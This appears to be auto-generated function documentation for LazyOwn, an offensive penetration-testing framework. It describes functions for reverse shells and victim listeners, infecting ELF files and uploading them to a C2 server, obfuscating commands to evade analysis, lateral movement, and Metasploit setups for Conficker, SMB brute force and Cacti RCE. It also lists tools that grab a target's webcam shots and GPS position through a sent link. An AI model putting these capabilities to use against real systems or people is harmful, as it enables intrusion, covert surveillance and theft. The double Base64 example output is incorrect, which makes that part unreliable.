Steps: 1. Verifies if the credentials file exists in the “sessions” directory. If not, prompts the user for a username and password. 2. Reads the credentials file if it exists and extracts the username and password. 3. Constructs an scp command to deploy the “sessions” directory to the remote host. 4. Executes the scp command using the system shell.

Args: line (str): Input command line (optional). The third parameter can be ‘win’ or ‘lin’ to specify the target OS.

Dependencies: - The sshpass command-line tool must be installed on the local machine. - scp must be installed on both the local and remote machines. - The remote host must be accessible via SSH.

Attributes: - self.params: Dictionary containing the following keys: - username (str, optional): Predefined username. Defaults to prompting the user if not provided. - password (str, optional): Predefined password. Defaults to prompting the user if not provided. - rhost (str): Remote host’s IP or domain name.

Raises: - KeyError: If rhost is not provided in self.params. - FileNotFoundError: If the “sessions” directory does not exist.

Note: - The credentials.txt file, if present, should have credentials in the format username:password on the first line.

Returns: None

apt_proxy

Configures the local machine with internet access to act as an APT proxy for a machine without internet access.

Steps: 1. Installs and configures apt-cacher-ng on the local machine. 2. Generates the necessary commands to configure the remote machine to use the proxy. 3. Copies the commands to the clipboard using the copy2clip function.

Parameters: line (str): The IP address of the remote machine without internet access.

Returns: None

pip_proxy

Configures the local machine with internet access to act as a pip proxy for a machine without internet access.

Steps: 1. Installs and configures squid on the local machine. 2. Generates the necessary commands to configure the remote machine to use the proxy. 3. Copies the commands to the clipboard using the copy2clip function.

Parameters: line (str): The IP address of the remote machine without internet access.

Returns: None

internet_proxy

Configures the local machine with internet access to act as a proxy for a machine without internet access.

Steps: 1. Installs and configures squid on the local machine. 2. Generates the necessary commands to configure the remote machine to use the proxy. 3. Copies the commands to the clipboard using the copy2clip function.

Parameters: line (str): The IP address of the remote machine without internet access.

Returns: None

check_update

Checks for updates by comparing the local version with the remote version.

This function: - Fetches the remote version from a JSON file hosted on GitHub. - Reads the local version from a JSON file in the script’s root directory. - Compares the version numbers and determines if an update is needed.

Behavior: - Requires requests library to fetch the remote version. - Uses JSON parsing to extract version numbers.

Usage: check_update

wmiexecpro

Executes wmiexec-pro with various options for WMI operations.

This function handles the installation of wmiexec-pro and its dependencies, and allows the user to execute various WMI operations with minimal input. It reads credentials from a specified file and constructs the necessary commands to interact with the target system.

:param line: Command line input from the user. This input is used to determine the module and action to be executed. :returns: None

The function performs the following steps: 1. Checks if wmiexec-pro and its dependencies are installed. If not, it installs them in specified directories. 2. Reads credentials from a file. 3. Constructs and executes the wmiexec-pro command based on user input. 4. Enumerates available modules and actions for each module, allowing the user to select them interactively. 5. Enumerates available options for each action, allowing the user to select them interactively.

Example usage:

do_wmiexecpro("enum -run")

This will execute the enumeration module with the -run action.

If no specific command is provided, the function will prompt the user to select a module and action interactively.

create_session_json

Generates or updates a JSON file to be used as a database.

The JSON file will be named sessionLazyOwn_{timestamp}.json and will be stored in the sessions directory. The JSON file will contain data from self.params and additional data extracted from credentials*.txt and hash*.txt files.

The structure of the JSON file will be as follows: - params: Data from self.params. - credentials: A list of dictionaries containing usernames and passwords extracted from credentials*.txt files. - hashes: A list of dictionaries containing the contents of hash*.txt files. - notes: The content of the notes.txt file, if it exists.

Returns: None

shellcode2elf

Convert shellcode into an ELF file and infect it.

This function takes an optional input line that specifies the name of the shellcode file. If no input line is provided, a filename is generated based on the domain. The function reads the shellcode and inserts it into a C source file, then compiles the source file into an ELF file. It also creates an infected version of the ELF file and uploads all generated files to a command and control (C2) server.

Args: line (str): An optional input line that specifies the name of the shellcode file.

Returns: None

ssh_cmd

Perform Remote Execution Command trow ssh using grisun0 user, see help grisun0

Parameters: line (str): The command line input, is the command to execute, if not presented is whoami

Returns: None

clone_site

Clone a website and serve the files in sessions/{url_cloned}. Args: line (str): input line that url to clone

Returns: None

knokknok

Send special string to trigger a reverse shell, with the command ‘c2 client_name’ create a listener shell script to drop the reverse shell in python3 Args: line (str): input line not used

Returns: None

listener_go

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim. The input should include the victim ID, the choice of listener type, and optionally the port numbers. The function then constructs the appropriate command to start the listener and assigns the necessary parameters.

Args: line (str): The command line input containing the victim ID, listener type, and optional port numbers.

Returns: None

Raises: None

Example: >>> listener_go victim1 2 1337 7777

listener_py

Configures and starts a listener for a specified victim.

This function takes a command line input to configure and start a listener for a specified victim. The input should include the victim ID, the choice of listener type, and optionally the port numbers. The function then constructs the appropriate command to start the listener and assigns the necessary parameters.

Args: line (str): The command line input containing the victim ID, listener type, and optional port numbers.

Returns: None

Raises: None

Example: >>> listener_py victim1 2 1337 7777

ipinfo

Retrieves detailed information about an IP address using the ARIN API.

This function takes an IP address as input, queries the ARIN API to get detailed information about the IP, and then displays the organization name and the network range associated with the IP.

Args: line (str): The command line input containing the IP address to query.

Returns: None

Raises: None

Example: >>> ipinfo 1.1.1.1

service_ssh

Creates a systemd service file for a specified binary and generates a script to enable and start the service.

This function takes the name of a binary as input, creates a systemd service file for it, and generates a shell script to enable and start the service. The script is saved in the sessions directory and a command is provided to execute the script remotely via SSH.

Args: line (str): The command line input containing the name of the binary. If an absolute path is not provided, a default path is used.

Returns: None

Raises: None

Example: >>> service my_binary_name

service

Creates a systemd service file for a specified binary and generates a script to enable and start the service.

This function takes the name of a binary as input, creates a systemd service file for it, and generates a shell script to enable and start the service. The script is saved in the sessions directory and a command is provided to execute the script remotely via SSH.

Args: line (str): The command line input containing the name of the binary. If an absolute path is not provided, a default path is used.

Returns: None

Raises: None

Example: >>> service my_binary_name

toctoc

Sends a magic packet to the Chinese malware. The function extracts rhost and rport from self.params[“rhost”] and self.params[“rport”], respectively.

upload_c2

Upload a file to the command and control (C2) server.

This function handles the uploading of a file to the C2 server. If no file is specified in the input line, it prompts the user to enter the file extension (defaulting to ‘txt’) and retrieves the file using the get_users_dic function. If a file is specified in the input line, it directly uploads that file.

Args: line (str): The input line containing the file path to upload. If empty, the function will prompt the user to enter the file extension.

Returns: None

download_c2

Download a file from the command and control (C2) server.

This function handles the downloading of a file from the C2 server. It requires the remote path of the file to be specified in the input line. If the input line is empty, it prints an error message and returns.

Args: line (str): The input line containing the remote path of the file to download. If empty, the function will print an error message.

Returns: None

groq

Execute a command to interact with the GROQ API using the provided API key.

This function takes an optional input line that is used as the prompt. If no input line is provided, the default prompt stored in the instance is used. The function sets the GROQ_API_KEY environment variable and runs a Python script to interact with the GROQ API.

Parameters: line (str): The input line to be used as the prompt. If not provided, the default prompt is used.

Returns: None

c2asm

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding assembly code side by side. It allows the user to select a .c file from the ‘sessions’ directory and then displays the code with scrolling capabilities both vertically and horizontally. A green vertical line separates the C code from the ASM code.

Parameters: stdscr (curses.window): The curses window object to draw on.

Returns: None

view_code

Display C and ASM code side by side in a curses-based interface.

This function sets up a curses window to display C code and its corresponding assembly code side by side. It allows the user to select a .c file from the ‘sessions’ directory and then displays the code with scrolling capabilities both vertically and horizontally. A green vertical line separates the C code from the ASM code.

Parameters: stdscr (curses.window): The curses window object to draw on.

Returns: None

camphish

Executes the camphish tool for Grab cam shots from target’s phone front camera or PC webcam just sending a link.

This function: - Installs camphish if not already installed. - Executes the camphish command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires git and php to be installed. - Uses a one-liner installation method for simplicity.

Usage: camphish

hound

Executes the hound tool for Hound is a simple and light tool for information gathering and capture exact GPS coordinates

This function: - Installs hound if not already installed. - Executes the hound command with the provided parameters. - Displays the result in the terminal.

Behavior: - Requires git and php to be installed. - Uses a one-liner installation method for simplicity.

Usage: hound

ofuscatesh

Obfuscates a shell script by encoding it in Base64 and prepares a command to decode and execute it.

This function reads the content of a shell script file, encodes it in Base64, and constructs a command that can be used to decode and execute the encoded script using echo and base64 -d.

Args: line (str): The path to the shell script file to be obfuscated. If not provided, a default path is obtained from the get_users_dic function.

Returns: None

Example: >>> ofuscatesh /path/to/script.sh or just ofuscatesh # This will read the script, encode it in Base64, and prepare a command to decode and execute it.

load_session

Load the session from the sessionLazyOwn.json file and display the status of various parameters.

This command reads the sessionLazyOwn.json file from the sessions directory and displays the status of parameters, credentials, hashes, notes, plan, id_rsa, implants, and redop.

:param line: Additional arguments (not used in this command)

lateral_mov_lin

Perform lateral movement by downloading and installing LazyOwn on a remote Linux machine.

This function automates the process of setting up an APT and PIP proxy, downloading the LazyOwn package, transferring it to a remote machine, and installing it. The function ensures that all necessary directories are created and that the package is correctly installed on the remote machine.

Parameters: line (str): The command line input, which is not used in this function.

Returns: None

find_tgts

Finds and returns a list of target hosts with port 445 open in the specified subnet.

Args: subnet (str): The subnet to scan, e.g., ‘192.168.1.0/24’.

Returns: list: A list of IP addresses where port 445 is open.

setup_handler

Sets up a Metasploit multi/handler configuration in the given config file.

Args: config_file (file-like object): The file object to write the Metasploit handler configuration to. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for Metasploit to the provided file.

conficker_exploit

Configures and writes a Metasploit exploit for the Conficker vulnerability to the given config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address to exploit. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for the Conficker vulnerability (MS08-067) to the provided file.

smb_brute

Configures and writes a Metasploit SMB brute force exploit for the given host to the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address to exploit. passwd_file (str): Path to a file containing a list of passwords to use for brute force. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for SMB brute force (using the psexec module) to the provided file for each password in the passwd_file.

setup_handler

Sets up a Metasploit multi/handler exploit configuration in the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit handler configuration to. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Configuration commands to the file to set up the Metasploit handler with the specified payload and options. - The payload used is php/meterpreter/reverse_tcp. - The handler is configured to listen on the provided LHOST and LPORT. - Starts the exploit with the -j -z options.

cacti_exploit

Configures an exploit for the Cacti Package Import Remote Code Execution vulnerability in the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address where the Cacti service is running.

Writes: - Configuration commands to the file to set up the Metasploit exploit for the Cacti Package Import RCE. - Sets the RHOST to the target host IP. - Sets the payload options including the LHOST, USERNAME, and PASSWORD. - Starts the exploit with the -j -z options.

single_combo

Generates single character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

double_combo

Generates double character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

triple_combo

Generates triple character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

fourth_combo

Generates fourth character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

fifth_combo

Generates fifth character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

sixth_combo

Generates sixth character combinations with the target name, adding uppercase characters.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

intercalate_combo

Generates combinations of the target name and character list, intercalating uppercase and lowercase characters.

This function generates combinations where each character in the string alternates between uppercase and lowercase. It also allows for the addition of the target name at the beginning or the end of the string.

:param name: Target name to use in the combinations. :param characters: List of characters to intercalate with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.

expand_regex

Expands a regular expression into a list of characters.

:param regex: Regular expression string to expand. :returns: List of characters matching the regular expression.

install_netexec

No description available.

install_netexec_pipx

No description available.

load_chameleon

No description available.

load_betterxencrypt

No description available.

load_pyfuscation

No description available.

reverse_b64_encoder

No description available.

load_psobfuscation

No description available.

install_wmiexecpro

No description available.

double_base64_encode

Perform double Base64 encoding on the given command.

This helper function takes a command string, encodes it in Base64, and then performs another Base64 encoding on the result. The final encoded string is returned.

Args: cmd (str): The command string to be encoded.

Returns: str: The double Base64 encoded string.

Example: >>> double_base64_encode(“example”) ‘ZWN4YW5hbWVsZQ==’

Notes: - The function first encodes the command string into bytes using UTF-8 encoding. - It then applies Base64 encoding twice and removes any leading or trailing whitespace. - The result is decoded back to a string and returned.

Raises: TypeError: If the input cmd is not a string.

apply_obfuscations

Generate a list of obfuscated commands based on the given input command.

This function creates various obfuscated versions of the provided command string. Each obfuscation method applies a different technique to disguise the command, making it less recognizable to simple static analysis.

Args: cmd (str): The command string to be obfuscated.

Returns: list of str: A list of obfuscated command strings.

Notes: - Each obfuscation method aims to transform the command in a unique way. - Obfuscations include encoding, character replacement, and command substitution techniques. - Ensure that the double_base64_encode function is defined and available in the scope where this function is used.

Raises: TypeError: If the input cmd is not a string.

alternate_case

Helper function to alternate the case of characters in a string.

lazyrun_command

No description available.

resolve_and_download_dependencies

Recursively resolve and download package dependencies with enhanced checks